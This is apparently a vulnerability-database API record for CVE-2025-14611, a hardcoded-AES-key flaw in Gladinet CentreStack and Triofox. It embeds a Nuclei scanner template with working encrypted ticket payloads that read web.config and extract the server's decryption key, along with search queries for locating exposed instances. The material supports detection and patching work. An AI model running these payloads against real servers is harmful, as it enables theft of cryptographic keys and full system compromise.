{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-14611/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-14611/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-14611/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-14611/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-14611/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-14611"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-14611"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": true
    },
    "epss": {
      "epss": 0.53302,
      "kev": true,
      "percentile": 0.98935
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2025/CVE-2025-14611.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2025-14611\n\ninfo:\n  name: Gladinet CentreStack & Triofox - Hardcoded Credentials\n  author: 0xanis\n  severity: critical\n  description: |\n    Gladinet CentreStack and Triofox < 16.12.10420.56791 contain a hardcoded credentials vulnerability caused by use of hardcoded AES cryptoscheme values, letting attackers perform arbitrary local file inclusion without authentication, potentially leading to full system compromise.\n  impact: |\n    Attackers can exploit hardcoded AES keys to perform arbitrary local file inclusion, potentially leading to full system compromise.\n  remediation: |\n    Update to version 16.12.10420.56791 or later.\n  reference:\n    - https://www.huntress.com/blog/active-exploitation-gladinet-centrestack-triofox-insecure-cryptography-vulnerability\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-14611\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cwe-id: CWE-321\n  metadata:\n    verified: true\n    max-request: 2\n    fofa-query: title=\"CentreStack\" || title=\"Triofox\"\n    google-query: intitle:\"CentreStack - Login\" || intitle:\"Triofox - Login\"\n  tags: cve,cve2025,gladinet,centrestack,triofox,kev,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/storage/filesvr.dn?t={{ticket}}\"\n\n    attack: batteringram\n    payloads:\n      ticket:\n        # C:\\Program Files (x86)\\Gladinet Cloud Enterprise\\root\\web.config\n        - \"vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m|GbA|RIwrK0WT6jLb:ulpCaAEZ7n1cnc6XQR3EtoADI\"\n        # C:\\Program Files\\Gladinet Cloud Enterprise\\root\\web.config\n        - \"vghpI7EToZUDIZDdprSubEhRtHNTizyG2QqrcdDETcITXhiueSqu1pPPD0BQ03d6BDri8Usk8QTlEK1U8I2khiLTdy5632hOGCvV6bq1ZSQKpxPmISgLb:TSHrns|y3r\"\n\n    stop-at-first-match: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"<configuration>\",\"<system.web>\")'\n          - 'contains_any(header, \"application/xml\",\"text/xml\",\"application/octet-stream\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body\n        name: decryption_key\n        group: 1\n        regex:\n          - 'decryptionKey=\"([A-Fa-f0-9]+)\"'\n# digest: 4a0a00473045022069197797e382f8c1a348a5fb9e3cc273758d8e5dcd15a0572c239dccb9f4607502210094391aab07557cba98c2f448b87ac5917dc4be232094a124500460a84c6003a5:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2025-14611"
}